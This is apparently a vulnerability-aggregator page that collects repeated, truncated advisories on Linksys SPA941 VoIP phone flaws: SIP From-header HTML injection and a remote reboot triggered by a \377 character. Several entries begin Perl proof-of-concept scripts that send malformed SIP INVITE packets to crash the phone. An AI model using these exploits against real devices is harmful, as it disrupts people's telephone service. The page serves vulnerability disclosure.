EUVD-2007-5387

Malware in sbrugna...

Linksys SPA941 SIP From Field HTML Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/25987/info Linksys SPA941 devices are prone to an HTML-injection vulnerability because the built-in webserver fails to properly sanitize user-supplied input before using it in dynamically generated content...

Cross site scripting

Cross-site scripting XSS vulnerability in the Linksys SPA941 VoIP Phone with firmware 5.1.8 allows remote attackers to inject arbitrary web script or HTML via the From header in a SIP message...

CVE-2007-5411

Cross-site scripting XSS vulnerability in the Linksys SPA941 VoIP Phone with firmware 5.1.8 allows remote attackers to inject arbitrary web script or HTML via the From header in a SIP message...

CVE-2007-5411

CVE-2007-5411 affects Linksys SPA941 VoIP Phone firmware 5.1.8. The vulnerability is a cross-site scripting (XSS) issue that allows remote attackers to inject arbitrary web script or HTML via the From header in a SIP message. The provided documents identify the affected device and the attack vect...

CVE-2007-5411

Cross-site scripting XSS vulnerability in the Linksys SPA941 VoIP Phone with firmware 5.1.8 allows remote attackers to inject arbitrary web script or HTML via the From header in a SIP message...

Linksys SPA941 - SIP From HTML Injection

Linksys SPA941 - SIP From HTML Injection source: https://www.securityfocus.com/bid/25987/info Linksys SPA941 devices are prone to an HTML-injection vulnerability because the built-in webserver fails to properly sanitize user-supplied input before using it in dynamically generated content...

Linksys SPA941 - 'SIP From' HTML Injection

source: https://www.securityfocus.com/bid/25987/info Linksys SPA941 devices are prone to an HTML-injection vulnerability because the built-in webserver fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would...

CVE-2007-2270

CVE-2007-2270 affects the Linksys SPA941 VoIP Phone. The vulnerability is triggered by a 0xff character in the SIP INVITE From header (and possibly other locations), leading to a denial of service via device reboot. The available documents provide the impact and affected component but do not spec...

CVE-2007-2270

The Linksys SPA941 VoIP Phone allows remote attackers to cause a denial of service device reboot via a 0377 0xff character in the From header, and possibly certain other locations, in a SIP INVITE request...

Linksys SPA941 \377 character Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl use IO::Socket::INET; die "Usage $0 dst port username" unless $ARGV2; $socket=new IO::Socket::INET-newPeerPort=$ARGV1, Proto='udp', PeerAddr=$ARGV0; $msg = "INVITE sip:$ARGV2@$ARGV0 SIP/2.0\377\r Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00\377\r...

Linksys SPA941 (remote reboot) Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl use IO::Socket; die "Usage $0 username dstIP SourceIP SourcePort" unless $ARGV2; die "Usage $0 username dstIP SourceIp sourceport" unless $ARGV0; my $sock = new IO::Socket::INET LocalHost = $ARGV2, LocalPort = $ARGV3, Proto = 'udp'; $socket=new...

Linksys SPA941 \377字符拒绝服务漏洞

Linksys SPA941是一款2线或4线的IP电话。 Linksys SPA941在处理畸形消息时存在漏洞，远程攻击者可能利用此漏洞导致设备重启。 Linksys SPA941电话没有正确地处理SIP消息中的\377字符，如果攻击者在发送消息的FROM头中任意部分包含有上述字符的话，就可能导致电话重启；如果字符位于其他位置的话就可能修改电话所生成回复消息的内容。 Linksys SPA941 5.1.5 Linksys ------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.linksys.com...

[Full-disclosure] Linksys SPA941 remote DOS with \377 character

MADYNES Security Advisory http://madynes.loria.fr/ http://madynes.loria.fr Title: Linksys SPA941 remote DOS with 377 character Discovery Date: 01/02/2007 Vendor notification: 4/04/2007 and 17/04/2007 Release Date: 24/04/2007 Severity: Moderate - Denial of Service Advisory ID:KIHP3 Vulnerability i...

Linksys SPA941 - Remote Reboot (Denial of Service)

Linksys SPA941 - Remote Reboot Denial of Service !/usr/bin/perl use IO::Socket; die "Usage $0 " unless $ARGV2; die "Usage $0 " unless $ARGV0; my $sock = new IO::Socket::INET LocalHost = $ARGV2, LocalPort = $ARGV3, Proto = 'udp'; $socket=new IO::Socket::INET-newPeerAddr=$ARGV1, PeerPort= '5060',...

Linksys SPA941 377 character Remote Denial of Service Exploit

Exploit for hardware platform in category dos / poc ============================================================== Linksys SPA941 \377 character Remote Denial of Service Exploit ============================================================== !/usr/bin/perl use IO::Socket::INET; die "Usage $0 "...

Linksys SPA941 - \377 Character Remote Denial of Service

Linksys SPA941 - \377 Character Remote Denial of Service !/usr/bin/perl use IO::Socket::INET; die "Usage $0 " unless $ARGV2; $socket=new IO::Socket::INET-newPeerPort=$ARGV1, Proto='udp', PeerAddr=$ARGV0; $msg = "INVITE sip:$ARGV2@$ARGV0 SIP/2.0\377\r Via: SIP/2.0/UDP...

Linksys SPA941 - '\377' Character Remote Denial of Service

!/usr/bin/perl use IO::Socket::INET; die "Usage $0 " unless $ARGV2; $socket=new IO::Socket::INET-newPeerPort=$ARGV1, Proto='udp', PeerAddr=$ARGV0; $msg = "INVITE sip:$ARGV2@$ARGV0 SIP/2.0\377\r Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00\377\r Max-Forwards: 70\377\r To: lynksys \377\r From:...

Linksys SPA941 - Remote Reboot (Denial of Service)

!/usr/bin/perl use IO::Socket; die "Usage $0 " unless $ARGV2; die "Usage $0 " unless $ARGV0; my $sock = new IO::Socket::INET LocalHost = $ARGV2, LocalPort = $ARGV3, Proto = 'udp'; $socket=new IO::Socket::INET-newPeerAddr=$ARGV1, PeerPort= '5060', Proto='udp', LocalAddr=$ARGV2, LocalPort='5061';...

Linksys SPA941 (remote reboot) Remote Denial of Service Exploit

Exploit for hardware platform in category dos / poc =============================================================== Linksys SPA941 remote reboot Remote Denial of Service Exploit =============================================================== !/usr/bin/perl use IO::Socket; die "Usage $0 " unless...